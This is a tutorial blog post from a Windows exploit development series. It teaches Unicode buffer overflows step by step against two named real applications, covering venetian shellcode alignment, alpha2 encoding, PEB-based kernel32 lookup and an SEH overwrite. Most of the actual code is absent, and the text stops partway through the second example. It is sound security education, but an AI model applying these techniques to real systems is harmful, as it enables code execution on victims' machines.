Windows Exploit Development – Part 7: Unicode Buffer Overflows

Written on:September 3, 2014
Comments are closed


In this seventh installment of the Windows Exploit Development Series, I’ll introduce Unicode Buffer Overflows. We’ll start with a brief introduction to Unicode (what it is and why/how it’s used in Windows) and then jump right in to some example exploits. If you plan on following along, I recommend you have the following:

    • A Windows environment (XP or Win 7 — my demos will be on the latter)
    • Metasploit, Alpha2 or Alpha 3 encoder
    • An assembler/disassembler (e.g. nasm/ndisasm)
    • Dumpbin Utility
    • Immunity Debugger with the Mona plugin
    • A scripting language (I’ll use Perl for these demos).

While I’m going to cover several topics and provide multiple examples, it’s always beneficial to have other reference material when learning a new topic; here are some that I recommend:

I also recommend you check out some of my prior tutorials to ensure you have a solid understanding of exploit basics (registers, the stack, memory layout, etc), how buffer overflow attacks work, SEH-based exploits and jumping techniques.

What is ANSI?

Year ago, Windows introduced “code pages” to accomplish string encoding by mapping ASCII and international language character sets to specific code values (e.g., A=41, B=42, etc) and storing them in individual pages. Many character sets, including ASCII, are considered single-byte character sets because each character/letter can be represented by a single byte. Other, more complex languages such as Japanese and Chinese, require double-byte encoding where some letters must be represented by two bytes. Each Windows installation is assigned a default code page corresponding to the the default language configured on the system. Depending on your default language, you may be using a different code page than I do. The most common code page (and the one I am using) is Code Page 1251 (Windows Latin I). This and other code pages were supposedly originally developed based on draft ANSI encoding standards and so they came to be known as “ANSI Code Pages”. Although these standards were never officially released by ANSI and the name “ANSI Code Page” was considered a misnomer, text that is encoded using code pages is still referred to as “ANSI” in current Microsoft parlance. In fact, you will see multiple Windows string functions appended with an “A” or “W”, which correspond to ANSI functions and Wide (or Unicode) functions. ANSI functions manipulate strings encoded by a code page, whereas Wide functions work with Unicode strings.  In the Windows environment, when you think of a typical, null-terminated, single-byte ASCII string, you should think ANSI. These strings are also referred to as “multibyte” strings. I will typically refer to non-Unicode strings as either ANSI or multibyte strings in this post.

The problem with code pages is that it’s not a very elegant or uniform way of managing character encoding and so a better standard was developed called Unicode.

What is Unicode?

The Unicode standard, originally founded by Apple and Xerox in 1988 and further developed by a larger consortium starting the early 90s, was developed to better accommodate languages with large character sets (Japanese, Cyrillic, Arabic, etc) that could not be represented by the limited symbols available in the traditional single-byte character set.1

There are several Unicode Transformation Format (UTF) standards, such as UTF-8 and UTF-32, but when we’re talking about Windows, the standard in use is UTF-16. With UTF-16 each character is encoded as 2 bytes (16 bits). Because it consistently uses two bytes, it can represent all of the various international characters in a more standardized and ultimately, more efficient manner than trying to manage individual single- and multi-byte code pages. Note: there are also surrogate and supplementary characters that use more than 16 bits, but we won’t cover that in this post. Feel free to read up on them here.

The UTF-16 standard is organized by character set. For example, bytes 0000-007F represent the standard ASCII character set, 0080-00FF represent Latin1 characters, 0100-017F represent European Latin, etc. (through 097F).

The reason Unicode encoding is such an important topic as it relates to Windows exploit building is because Windows (since NT) represents all of its internal kernel/OS/API strings in Unicode. Further, many modern applications are moving away from the standard ANSI character sets and towards the Microsoft-recommended Unicode encoding. You’re also likely to run into Unicode if you frequently test internationally-developed applications.

When strings are declared in a Windows application they are either be represented in multibyte/ANSI (A) or Unicode (W — aka Wide) and the Windows API contains functions that have both an “A” and “W” version. The “A” versions utilize the system’s currently active code page whereas the “W” versions use the Unicode standard.

I sometimes see confusion surrounding the terms ANSI, ASCII, and Unicode. Many texts and debuggers label a string as either “ASCII” or “Unicode”. Not to mention, “ANSI encoding” is technically a misnomer introduced and perpetuated by Microsoft and the Unicode standard includes more than just UTF-16. Regardless of what is technically correct, this series is focused on Windows-exploits so we must use the Microsoft frame of reference. Therefore, it may help to remember the following points:

  • First and foremost, in Microsoft-speak, you’re typically either working with an ANSI (multi-byte) string or with a Unicode (UTF-16/wide) string.
  • Both ANSI and Unicode can represent the ASCII character set just as they can both represent international languages — they just do it in a different manner. ANSI uses code pages made up of a mix of single- and multi-byte characters whereas Unicode uses a standardized 2-byte encoding. In other words, ASCII can be ANSI-encoded or it can be Unicode-encoded. That being said…
  • If you hear or read a reference to an “ASCII” string (vs. a Unicode string), it is likely referencing a typical “ANSI” encoded string represented by single-byte ASCII characters.

1 Reference: Windows via C/C++ (5th Edition) (Developer Reference) Nasarre, Christophe; Richter, Jeffrey

A closer look at Unicode vs. ANSI strings

Quite often, the strings we enter as input to an application are internally represented as (or converted to) Unicode (aka “Wide”) strings. While this may be transparent to the standard application user, it means our input is converted from its single-byte, code-page representation to a two-byte Unicode value.

Let’s use the following code example to see how ANSI (multibyte) and Unicode (wide) strings are represented in memory.

You can compile it and run it with your debugger, pausing it on the first executable instruction.


The various function calls should be evident. Pay particular attention to pStrA, a pointer to a typical, null-terminated multibyte/ANSI string as it’s stored in memory (see above screenshot). Note all of the ASCII A’s are stored as consecutive single bytes (0x41).

The next several function calls serve to convert that ANSI string to a Wide (Unicode) string. The first function call to GetACP retrieves the number of the current code page.

win_exploit_7_18Next, is a call to MultiByteToWideChar which is the Windows function that converts an ANSI string to a Unicode string.


However, this first call doesn’t actually convert anything. Instead, (we pass null for WideCharBuf and 0 for WideBufSize) it returns the length of the resulting wide string which is then passed to HeapAlloc so we can reserve the necessary memory. As you can see below, the HeapSize is 38, or twice the length of our ANSI string. This accounts for the two-byte Unicode encoding.


Now that we have the necessary memory reserved, the second call to MultiByteToWideChar will actually make the Unicode conversion. You can see below that we now pass the location of our memory allocation and our buffer size.


Here’s the result:


On the right side of the above screenshot, you can see the resulting Wide string on top of the stack, prefaced by “UNICODE“. On the left you can see this same string as it’s stored in memory in its two-byte encoding. Because this string is comprised of ASCII characters that fall within the 0x00-0x7F byte range, they don’t need to use both bytes of the Unicode representation, so each character byte is followed by a null byte (0x00). This automatic padding of nulls certainly can’t be good for exploit code…

How does Unicode affect our exploits?

In the traditional buffer overflows we’ve examined so far, the exploit buffer and shellcode you provide as input to the vulnerable application is parsed as an ANSI string (at least to the point of the overflow) and your original exploit code is preserved. Now imagine what would happen if your shellcode is converted to a Unicode string and padded with alternating null bytes. It wouldn’t execute the instructions as originally intended. As a simple example, lets say you had the following shellcode:  \x41\x42\x43

This translates to the following Assembly instructions:

If that shellcode were to be translated to Unicode at the time of the overflow, it would look as follows: \x41\x00\x42\x00\x43\x00.

This translates to the following Assembly:

Not exactly the same instructions we had intended, which will probably lead to an unsuccessful exploit.

As a more thorough illustration, I’ve provided the following simple C program that will take one of three command line arguments:

  • ‘A’ to execute standard ANSI-based shellcode like a traditional buffer overflow exploit,
  • ‘W’ to execute encoded shellcode to represent a successful Wide/Unicode-based exploit
  • ‘F’ (for Fail) to show what happens when you try to execute ANSI shellcode in a Unicode exploit.

Here’s a look at passing arg -A (successful standard overflow, left) and arg -F (unsuccessful ANSI exploit buffer in a Unicode exploit, right).


The window above right illustrates how trying to pass ANSI shellcode to a Unicode exploit will mangle the instructions and as you might imagine, the exploit will fail. Again, this is because the Unicode conversion injected null bytes that completely changed the original instructions (as they appear in left window). The corresponding results for both are below (with the unsuccessful attempt to pass ANSI shellcode to a Unicode exploit on the right).


So how about when you pass the ‘W’ parameter to the above program? Well in that case, the shellcode that’s passed to the Unicode “exploit” (shellW) has been specially encoded to account for the automatic insertion of null bytes. It can decode itself, remove the null bytes, and execute as originally intended. To do that, I used Metasploit’s alphanumeric uppercase unicode encoder to encode the shellcode payload specifically for a unicode exploit. In the next real world example exploit we’re going to build, I’ll show you another tool called alpha2 that does the same thing. The thing to keep in mind for both tools is that they produce an encoded version of the original shellcode. In order for it to decode in memory, they must prepend a decoding routine to the shellcode. This means your shellcode is going to be considerably larger to make room for the extra bytes added by the encoding as well as the addition of the decoding routine. Another thing to note is that these decoding routines need a designated register (i.e. “baseaddress” or “bufferregister”) to use as a reference point when decoding. You define this register at the time of encoding and you write additional instructions in your exploit buffer to adjust the address of that register to point to the beginning of your shellcode.

If this doesn’t make sense yet, don’t worry…we’ll build a couple of real-world exploits in the next two examples that should make it much clearer.

Example 1: Basic Unicode BOF

When I started looking for vulnerable programs to use as examples for this tutorial, I realized that only one of the Unicode-based exploits I’ve published to Exploit-DB has the application available for download and it was an SEH-based exploit. I wanted to start with a non-SEH unicode BOF and I came across this one:

Depending on your experience, this posted exploit code may look complex but have no fear…we’re going to develop a bit simpler POC version that accomplishes the same thing and illustrates the basics of Unicode exploits.

First, download the vulnerable application from the above Exploit-DB link and install it. We’re going to build our exploit to work on either Windows 7 SP 1 (which is what I’m using for this example) or Windows XP SP 3 so feel free to use either. You can use other versions of XP, but you will have to make some adjustments to the shellcode (I’ll tell you where).

Once installed, launch the application and attach Immunity Debugger. The vulnerable function is the registration code entry (“Entery SN”):

win_exploit_7_1We’ll build our test exploit buffer by simply printing a string of 5000 characters to a text file and copying/pasting it in the registration field (buffer = “\xcc” x 5000). I prefer to use something like a interrupt (\xcc) vs. all A’s (\x41) because in a Unicode exploit, the A’s could get translated to 00410041 which, depending on the executable/dll’s base address, may be a valid address. [INT instructions can also be translated to a valid address as you’ll see later so you may have to review the addresses of all loaded modules and choose and alternate character]. Should this happen, the application would still crash but the registers and stack may not reflect the true initial crash state.

Here’s what our Registers (including EIP) and memory dump look like with our string of 5000 \xcc (note: your addresses may vary from mine):


As you can see we have over 500 bytes of usable shellcode, but it seems to be broken up by some mangled/bad characters. We’re not quite sure yet exactly where our EIP overwrite falls within the buffer but we do see that EBX points close to the middle of the exploit code — this will help us later.

Because we’re building this first exploit as a standard BOF, let’s ignore any SEH overwrite. Our next step is to determine our offset to EIP. You can use the metasploit pattern generator provided in the Immunity Mona plugin. Generate a 5000 character pattern, copy it from the pattern.txt file, paste it in the vulnerable SN registration field, and trigger the overflow.


Remember my earlier point that the Unicode nulls in the EIP overwrite can cause it to inadvertently translate to a valid address…you can see that happens here with our EIP value of 0x00410036. Although this is where we’ve stopped (due to an exception), it’s not exactly the point at which the overflow was triggered. In fact, several instructions have executed and if we try and calculate our offset from this value in EIP, it will be wrong.

In this case, you can find the offset by trial and error or you can start at a higher offset in the metasploit pattern that won’t translate to a valid address when it overwrites EIP. I chose the latter, starting at character 2000 (just copy and paste the pattern starting at character 2000 through character 5000). This time our EIP overwrite does not translate to a valid address and we get an overwrite of 00330079.


The pattern offset function tells us our offset is at 2288, and since we started at character 2000 in our metasploit pattern, this translates to 288.


We need to take into account the fact that we started at character 0 (2000) and for the unicode null byte between 33 and 79 so we really have an offset of 290. This matches the offset in the original exploit posted to Exploit-DB, but let’s verify anyway. We’ll start building our exploit buffer with our offset of 290, a test EIP overwrite of \xcc, and some filler to even out our buffer.

Copying and pasting the resulting buffer and triggering the exploit gives us the following:


We’ve confirmed our EIP offset and can see it’s position is fairly centered in our exploit buffer. We know we have 290 bytes preceding EIP, but these don’t all appear to be usable as there are some random characters injected at the very end (leaving us with about 280 usable bytes).


We only have about 260 usable bytes after EIP which is where our initial exploit code will have to reside (to adjust our registers and jump to our shellcode) and no other copies of our buffer reside elsewhere in memory, which means we’ll either have to split our shellcode between the two spaces or keep it under ~280 bytes. Because splitting the shellcode would add additional instructions (for the extra jump) and both portions would have to be unicode formatted or encoded (which also consumes available bytes), I’m going to choose keep our shellcode under 280 bytes and place it all in our buffer before the EIP overwrite. This means our buffer will look something like this:


We’ll get to the shellcode and register adjustments shortly, but just like any traditional buffer overflow, we first we need to to figure out a way to use our EIP overwrite to direct execution flow to a predictable location in our buffer. We’ve already established that EBX points to a location somewhere in our buffer so a jump or call EBX instruction should do the trick. Of course, this can’t be just any jump or call instruction … it has to be a Unicode friendly address! In other words, it must contain two null bytes (or another unicode friendly two-byte combination).

We’ll use the Immunity mona plugin to find all CALL/JMP EBX instructions (!mona jmp -r ebx). Check the resulting output file for any that are unicode-friendly. We’re in luck, because we have three different options.

As a side note, addresses with two null bytes are technically not the only Unicode-friendly addresses. Certain characters in the extended ASCII set (0x80 and above) translate to two-byte Unicode that does not include a null. For example, \x85 translates to \x20\x26 in Unicode. That means 0x00432620 could also be a valid Unicode address (0x00432620 = \x20\x26\x43\x00 which translates to the following as your EIP overwrite: \x85\x43). This Blackhat presentation is a frequently-referenced source for those non-null Unicode transformations: Also note that mona returned more results than what I showed above (the rest were filtered out by my find command).

Back to our exploit, we’ll use the first address returned by mona (0x0043003e), which is the same address used in the exploit posted to Exploit-DB. Let’s test this CALL EBX instruction by updating our Perl exploit script (note I’ve switched the “B”s to “\xcc” to trigger an INT instruction so we can see where we land). Be sure to omit the null bytes from your address since the Unicode conversion will take care of that for us.

Generate and enter the new buffer as the BladeAPIMonitor Registration code…


Perfect, we’ve confirmed our CALL EBX instruction works and gets us to a predictable location in our shellcode. From the above image, you can see that there are some \xcc instructions that immediately precede the address pointed to by EBX. Counting backwards, you’ll find that there are exactly 20. That means after we take the the CALL EBX instruction we land in our buffer 20 bytes past our EIP overwrite. Let’s update our exploit code by adding a $junk2 parameter to account for this.

Of course, our ultimate goal is to execute our shellcode, but in order to do that we have to write some additional instructions that will:

  1. Put the address from EBX in EAX
  2. Adjust the address in EAX to point to our shellcode (which is 290 bytes before our EIP overwrite)
  3. “Jump” to EAX to redirect execution to our shellcode.

Moving EBX into EAX

Remember earlier when I said that the alphanumeric encoders we’re going to be using to make our shellcode “unicode-compatible” require a designated register for the decoding routine? We’re going to use EAX as our designated register which means we must get EAX to point to our shellcode. Since we know EBX points to our buffer, the first step is to move the address in EBX into EAX. We would normally just need to execute a push EBX (\x53) and a pop EAX (\x58) instruction. But take a look what happens if we try this here:


The push EBX instruction executes just fine but because the application converts our buffer to Unicode, the added nulls change our instructions and we don’t get the results we expected. All we have to do to overcome this problem is insert some additional instructions, that when combined with the added Unicode nulls, perform a benign action and align our other instructions so they execute as expected. So, instead of “\x53\x58“, we can do the following:

As you can see, we’ve inserted two additional one-byte instructions that, when combined with the nulls that the Unicode conversion automatically adds, will execute something benign — in this case adding al to [edx]. This use of these alternating padding instructions has come to be known as “Venetian shellcode”.

The Unicode buffer can be imagined to be somewhat similar to a Venetian
blind; there are “solid” bytes that we control, and “gaps” containing the
alternating zeroes.

– Chris Anley Creating Arbitrary Shellcode In Unicode Expanded Strings (Jan 8, 2002);

One thing to keep in mind here is that although these benign venetian shellcode instructions won’t be doing anything other aligning/padding our exploit instructions, they must still execute successfully. In our example, if [edx] pointed to an invalid location, any attempt to add a value to it would result in an exception and our exploit would fail. As a result, \x42 may not always work for every exploit and you’d have to find an instruction that targets a different register. No worries though, because there are plenty of other instructions to choose from as you can see below:


Let’s add our venetian padding to our exploit code and see how it works. Here’s our updated exploit:

And the result…


That worked. The addition of the venetian shellcode aligned our PUSH and POP instructions and now EAX holds the same address as EBX.

Getting EAX to point to our shellcode

The next step is to adjust EAX so it points to the beginning of our shellcode. We know we’re going to put our shellcode at the beginning of our buffer so we just need to calculate how far our current location is from the beginning of our buffer and subtract that value from EAX.

290 + 2 + 20 + 4 = 316    ($junk1 + $eip + $junk2 + $venalign)

We have to account for the null byte that is added to each inserted instruction which means we have to double our value to 624. So we need to subtract a total of 624d bytes from EAX. You can verify this by checking the addresses in the dump window:


Here’s the trick that will allows us to perform this subtraction this in a Unicode friendly manner:

First we’ll subtract 0x11001800 and then we’ll add 0x11001600. This gives a net subtraction of 200h or 512 decimal.

Those two instructions will look like this (note the absence of the \x00 bytes which will be added by the Unicode conversion):

As you can see this approach only works for whole numbers in increments of 100 hex. That means we’ll have to figure out another way to subtract the remaining 112d bytes. We have a couple of options. The simplest is merely to decrement EAX 112 times (sub eax = \x48). The drawback here is that with the addition of a Venetian shellcode alignment instruction for each sub instruction, this will eat up 224 bytes of our available buffer (“\x48\x42” x 112). For this demo that’s not a problem but in a real-world exploit, every byte may be a precious commodity.

We can get a bit more creative here. Let’s assume that our current EAX after subtracting 200h is 0x0089EBEC and our shellcode starts at  0x0089EB7C.  We’ve already established that we still need to subtract 0x70 or 112d to get EAX to point to that address, but what if we instead added 0x90 to al? That would be EC + 90 = 7C. Since this addition doesn’t affect the remaining bytes of EAX, that would give us our desired address of 0x0089eb7c. But how do we add 0x90 to AL? Look at our registers:


We can see that both ECX and EBP contain characters currently part of the $junk1 portion of our buffer. We know that we’re going to use a portion of these 290 bytes for our shellcode, and we can’t sacrifice much, but if we luck out and these registers contain bytes from the tail end of this 290 byte portion of our buffer, we might be able to use them. We can probably spare no more than 10 bytes of our shellcode space so let’s by splitting our $junk1 buffer into 280 “A”s and 10 NOPs (\x90).


Awesome. Now that we control the value in ECX, specifically the lower bytes (CL) , we can use the following instruction to get EAX where we want it to be: “\x00\xc8”; # add al,cl

That will add our current value in al (EC) and cl (0x90) and get us our desired value of 7C. To add this to our exploit we need to do a bit of adjusting as follows:

Notice the the bogus instruction I added before add al,cl. This instruction actually translates to the following opcode after Unicode translation: BF 00110011. The Unicode translation will add an additional \x00 to the end which will actually be tacked on to the beginning of our next instruction, giving us \x00\xc8 which translates to add al, cl.

By using this approach, we saved quite a bit of space in our buffer (216 bytes) that would have been devoted to decrementing EAX. You may have also noticed I changed the As at the beginning of the buffer to INT instructions (\xcc), which will be used to test our “jump” to EAX shortly.

“Jumping” to EAX

Now that we have EAX where we want it, we need to add some instructions that redirect execution to EAX. Unfortunately, we can’t use JMP EAX ( \xff\xe0) or CALL EAX (\xff\d0) because each are two byte instructions that will be clobbered by the null bytes of the Unicode translation.

As an alternative, we can push EAX to the stack and issue a RET instruction. I’ve updated the exploit code to include this:

Testing it out, we get the following successful result:


Now that we’ve successfully redirected program execution to the beginning of our buffer, all that’s left is to write our shellcode …

The Shellcode

It should be no surprise by now that we’re going to have to account for the null byte that will be injected after each byte of our shellcode. There’s a couple of ways to address this, one of which is to encode it. For this demo, we’re going to use the alpha2 encoder.

The output will be a unicode-friendly, alphanumeric version of our shellcode like this:


Alpha2 prepends a decoding routine to the shellcode to convert it back to its original form. Both the unicode-friendly encoding as well as the prepended decoder will take up space that we would normally have available for shellcode instructions in a non-unicode exploit so we’ll have to account for this in our relatively small buffer space. One important thing to note about Alpha2 is that it decodes the shellcode in place in memory, which means it must be written to a location with R/W/E privileges.

Note that there are other encoding tools besides alpha2. I’ll use Metasploit in the next real-world exploit example, but if you want an example of at least one more, you can check out the Corelan Unicode exploit post here.

Since we have to allocate room for the encoding overhead and the prepended decoding routine added by alpha2, we’re going to need to keep our pre-encoded shellcode under 80 bytes — that’s not a lot. In fact, an alpha-encoded out-of-the-box Metasploit calc.exe shellcode is over twice that in length. While I planned on waiting to cover shellcode writing for a later post, given the constraints of this exploit, it’s probably best that we just write our own.

Let’s start by outlining the objectives of our shellcode. Here are the four I’ve defined for this example

  1. Keep it under 80 bytes in length
  2. Launch calc.exe
  3. Ensure a clean exit from the vulnerable application
  4. Work on Windows XP SP3 and Windows 7 SP1

Let’s cover each of these in a bit more detail:

Objective 1: Keep it under 80 bytes

To work within our space constraints and encoding requirements we need to keep this shellcode under 80 bytes. This will limit some of our functionality and portability so we need to keep it in mind as we consider the remaining objectives.

Objective 2: Launch calc.exe

Keeping in line with previous examples, let’s make the purpose of this shellcode simple — to launch calc.exe.  We can do this by calling the WinExec() function found in Kernel32.dll. Here is the function prototype from MSDN:

It’s pretty simple, requiring only two parameters — the command we plan to call (in our case “calc”) and the display options of the resulting window (we’ll use 0). Although we know which DLL contains this function, we won’t necessarily know the address at which it’s loaded for a given machine, an issue we’ll tackle when we cover objective 4.

Objective 3: Ensure a clean exit from the vulnerable application

Our next objective will be a clean exit from the crashed application. For illustrative purposes, try the original exploit posted to Exploit-DB on a Windows 7 machine (the buffer string can be copied from the bottom of the exploit code).


In most cases, although calc.exe successfully launches, the BladeAPIMonitor application crashes and generates an exception prompt instead of exiting cleanly.


For this demo it doesn’t really matter, but if a real-world exploit requires persistence beyond the life of the parent process, an unclean exit could be problematic. Preventing such a crash will take up some of our limited shellcode space, but we should be able to make it work. To do so, we’ll use the ExitProcess() function, also found in Kernel32.dll.

Once again, the function parameters are really simple, requiring us only to pass an exit code (for which we’ll use 0).

Objective 4: Work on Windows XP SP3 and Windows 7 SP1

While the goal of most shellcode should be to make it as universal as possible, we’re pretty limited by our space requirements. I didn’t want to go the other extreme and only have this work on a single platform, so I chose the middle ground and made our objective to execute successfully on both Windows XP SP3 and Windows 7 SP 1. Getting this to work on non-ASLR Windows XP is a bit easier because we could technically hard-code the addresses of our functions and have this work fairly reliably. This approach wouldn’t work on Windows 7 as ASLR changes the base load address of the DLLs each time. Ideally we wouldn’t hard-code any addresses and instead use a Windows function such as GetProcAddress() to dynamically determine the addresses of our functions at run time, but given our space constraints and the fact that this is a tutorial on Unicode exploits (and not shellcode writing) I chose the middle ground — we’ll determine  the base address of the DLL(s) we plan to use, but hard-code the offsets to the functions. This will work because although ASLR will change the base address for each module, the offsets to the functions within the DLL will remain static across run times. That being said, Microsoft can and does change the DLLs, and in doing so, changes the offsets. The fact that we’re only going to use Kernel32.dll for this example means that these offsets should apply to the latest releases of Windows XP SP3 and Windows 7 SP 1, but if Microsoft releases a major update/SP for Windows 7, it may not longer function. Again, not universal, but certainly better than hardcoding the DLL base address.

Now that we’ve defined our objectives, let’s get to work…

For this example we’re going to write our shellcode in Assembly. When it comes to writing the Assembly you have several options. You can write it directly in a C program using the __asm keyword and compile with Visual Studio.

You can then disassemble the resulting compiled binary to get your opcodes or you can load it into a debugger like Immunity and copy the opcodes directly from there.


To incorporate them into an exploit script, you can then convert them to hex: \x33\xdb\xbb\x01\x00\x00\x00…

Another option is to write your shellcode in a text editor, save it as an .asm file and assemble it using an assembler such as NASM.


If you’re already comfortable with Assembly enough to know the most of the opcodes, yet another option would be to write your hex opcodes directly in a Perl script. Sometimes, if I need to encode the shellcode, I’ll use a simple script such as this one:

You can also use a command line tool like metasm to generate your opcode for any Assembly instructions you may not be sure of.


When it comes to choosing a “best” way, it really is a matter of preference. Sometimes, if I’m building in a Windows environment, I’ll go with C. Other times, I find myself generating the bulk of my shellcode in an Assembler, moving it to my exploit script and modifying/adding one-off instructions directly in my script using metasm. For this example, I’ll build the entire shellcode in an .asm file, assemble it, and encode it before incorporating it into our Perl exploit script.

Let’s get to it…

As we’ve already discussed, we will be using two functions from Kernel32.dll to meet objectives 2 and 3 (execute calc.exe and exit cleanly). To do so, we need to obtain the base address of that module. In order to also meet objective 4 (working in Win XP SP 3 and Win 7 SP 1), we need to be able to get this address dynamically at run time. There are several ways to do this, but the method we’re going to use is a more universal one that is described here. We’ll need to access the Process Environment Block (PEB), an opaque (partially documented) Windows structure that we touched on in Part 1 of this exploit series. It contains multiple process-specific data structures, one of which is useful to us for finding our DLL address. Specifically, the PEB_LDR_DATA structure (found at offset 0x0C of the PEB) contains an entry called InMemoryOrderModuleList, which is a doubly-linked list that contains all of the loaded modules for the process. What’s great about Kernel32.dll is that it’s always located at the third entry of this list so we know exactly where to find it. While we’re parsing the PEB, the other thing we’re going to want is the value of OSMajorVersion, which is located at offset 0xA4. We’ll need this value when we need to choose the appropriate offset to our Kernel32 functions depending on our target OS (XP vs 7). Here’s the first portion of our shellcode that gathers these two pieces of information for us.

Once these instructions have executed, ECX will contain OSMajorVersion and EBX will contain the base address of kernel32.dll.

Before we can call WinExec(), we need to push our parameters to the stack. Recall the function prototype:

With a stdcall calling convention we need to push the parameters to the stack in reverse (right-to-left) order. That means we must first push the uCmdShow parameter which will be 0. Then we’ll push the lpCmdLine parameter which will be the null-terminated string “calc“. Here’s how I accomplish this:

You’ll notice that I use 0 (zero) twice — once as the string terminator and again as the parameter to WinExec(). To do so, I chose to zero out a register (ESI) and push it to the stack twice. I could have just as easily used the push 0 instruction which would have also equated to a total of four bytes. In this case, it’s really just a matter of preference. However, if you needed to use a zero value more than twice, it would be more economical to use the one-byte push esi instruction vs the two-byte push 0 instruction. One more thing to note is that in order to get the pointer to the null-terminated “calc” string, I pushed the string to the stack, then moved the address of the stack pointer to EAX, before pushing that value as the parameter.

Although the parameters for WinExec() are pushed to the stack, we’re not quite ready to call the function…mainly because we don’t have the address to the function yet. While we do have the base address to Kernel32, we don’t yet have the offsets from this address where WinExec() and ExitProcess() are located. We can get these offsets by using the dumpbin.exe utility to list the DLL’s exported functions. Here’s the output from both Windows XP SP3 and Windows 7 SP1:

The third column of the output is the offset we’re looking for. We can use this along with the base address for kernel32.dll to generate the address of each function. Note that if you’re using any other version of Windows, you’ll get different offset values. If you want to test this exploit on that version, replace my offsets with those later on when we write them into our shellcode.

Ok, so we have the addresses to both of our functions for each OS. But how do we know which one to call from our shellcode? The answer lies in checking the OSMajorVersion value we grabbed earlier. Technically, this value alone is not enough to tell you which specific OS version is running. Normally you would also want to grab the OSMinorVersion value, as the two together represent the OS version. However, we’re making some significant assumptions, specifically that we’re either dealing with Windows 7 or Windows XP. Since they each have different OSMajorVersion values (6 vs. 5, respectively), that value alone will be all that we need. Just keep in mind that if this exploit is run on any version in between (Server 2008, Vista, Server 2003, etc), it will probably fail.

As you can see, if the OSMajorVersion = 5, we jump to a label “WinXP“, which we’ll get to in a minute. Otherwise, we’re going to proceed to the next section, which is Windows 7-specific.

Remember, EBX contains our base address to Kernel32.dll, so getting the address to each of our functions is simply a matter of adding the corresponding offsets to it.

We’ll do the exact same thing for Windows XP:

Finally, we need to call the WinExec() and ExitProcess() functions. When testing this exploit, I ran into some stack corruption issues when issuing the CALL instruction which prevented me from calling ExitProcess() afterwards. As an alternative, I chose to push the ExitProcess() address to the stack as the return address immediately before calling WinExec(). What this will do is return to ExitProcess() without the need for a separate call instruction and the program will exit cleanly.

That’s it, our shellcode is complete. Here it is all together:

We now need to assemble it and encode it using alpha2.

As a side note, if this were not a Unicode exploit and you needed to incorporate the resulting opcodes directly into your Perl exploit script (or you wanted to incorporate it into a C program), you could use the following bash one-liner (add a concatenation symbol such as . or + as needed) :

By the way, you’ll see that our shellcode is 74 bytes, in length, which means we met our first objective with some to spare! Now that we have our alpha2-encoded shellcode, we can complete our Perl exploit script:

Generate the buffer and execute in both Windows XP and 7 and you should get the same results:


Whew, we just covered a lot. Feel free to go back over this example if you’re still unclear on any of the points I covered. Otherwise, continue on to example number 2…an SEH Unicode exploit.

Example 2: SEH Unicode BOF

This next example is a very basic unicode SEH BOF based on a POC by metacom for AllPlayer 5.6.2. You can download the vulnerable app (v5.6.2) from the POC link. The exploit we’ll write in this example is a slight variation of the two I submitted to Exploit-DB (here and here) that should work for both Windows XP SP3 and Windows 7 SP1.

Triggering the Exploit

After you’ve installed the ALLPlayer application on your Windows 7 machine generate an m3u file containing a 5000 character buffer as follows:

Attach your debugger and open the m3u file in ALLPlayer, which should immediately generate an exception and pause the debugger. Hit Shift+F9 several times to trigger the SEH and you should see the following:


In the stack window (lower right) you can see the SEH record overwrite. Notice however in the disassembly window (top left) that the 00CC00CC overwrite corresponded to a valid address (an issue that I pointed out in the previous example). You’ll have to take this into account when it comes time to calculate the offset to Next SEH/SEH. Although I don’t show it in the above screenshot, if you examine the memory dump window you’ll see that the 5000 character buffer seems to be uninterrupted so we have no issues when it comes to space for our shellcode.

In Immunity, hit Alt+S to view the corrupted SEH chain:


So, we’ve confirmed we definitely have an SEH-based exploit and it’s definitely Unicode. Because this is a Unicode-based SEH-based BOF, our exploit is going to be constructed as follows:


Determining the Offset to Next SEH

The next step is to figure out the offset to Next SEH/SEH. I’ve already illustrated in the previous example how to do so using a Metasploit pattern, so I’ll spare those details here (just remember that you may need to start at an offset into the pattern to avoid overwriting EIP with a valid address).

You’ll find that the offset to Next SEH is 303. We can test that with the following modification to the Perl exploit script:

Using the resulting exploit buffer you should see something similar to the following in your debugger:


For a non-Unicode SEH exploit you would normally overwrite SEH with an address to a POP+POP+RET instruction sequence and overwrite Next SEH with a short jump to hop over SEH and into your shellcode (if you don’t know what I’m talking about, be sure to read this post before moving on). Unfortunately, that won’t work with a Unicode exploit because the two-byte jump instruction in Next SEH would get corrupted by the null byte insertion. Instead, we need to do the following:

  1. Overwrite Next SEH with two single-byte instructions that will execute successfully without interfering with the execution flow to our shellcode.
  2. Overwrite SEH with a Unicode-friendly POP+POP+RET address that will also translate to benign instructions and execute successfully without interfering with the execution flow to our shellcode.

Overwriting SEH

Let’s start with the SEH overwrite since that will get triggered first. To find a Unicode-friendly POP+POP+RET address, we can use mona (!mona seh). I ran the mona command on both Windows XP SP3 and Windows 7 so you can see that there is overlap in the addresses that should give us portability across multiple platforms. Once again we have plenty of addresses to choose from.


I’ll use the first one (0x004f002d), placing it in SEH (\x2d\x4f) and leave the \xcc instructions in Next SEH. Re-run the exploit and execute the POP+POP+RET and you should be paused at the first INT instruction located in Next SEH which means our SEH overwrite was successful.


Overwriting Next SEH

The goal with this Unicode exploit is the same as the previous–redirect execution to our encoded shellcode which must we need to point to by a pre-defined register (in this case EAX). However, take a look at the previous screenshot and note the current values of the registers. None of them point to our buffer. ESP and EBP are fairly close but would still require some significant adjustment. Now look at the stack. There are several addresses close to the top of the stack that do point to our buffer. Remember that for our Next SEH overwrite we can only use single-byte instructions. These could be completely benign instructions (such as how we used \x42 in the previous example) which would be fine if we had a register that pointed to our shellcode. However, since we don’t, we can use one of the bytes of our Next SEH overwrite to issue a POPAD instruction to load the registers with addresses from the top of the stack. The second byte of Next SEH can simply be a benign instruction (I’ll use \x47 = ADD BYTE PTR DS:[EDI],AL). Here’s the updated exploit script:

Notice in the above script I also adjusted the value $fill to include alternating benign instructions (\x47) and INTs (\xcc) to ensure proper alignment to pause on the first-encountered INT. Here’s the result:


After the POPAD several registers now point very close to our buffer, with ESI being the closest. Similar to the previous exploit example, we’ll put the address currently in ESI into EAX by issuing POP and RET instructions. Then we can modify the value in EAX using some ADD/SUB instructions and add some additional alignment instructions if necessary to ensure it points directly to our shellcode.

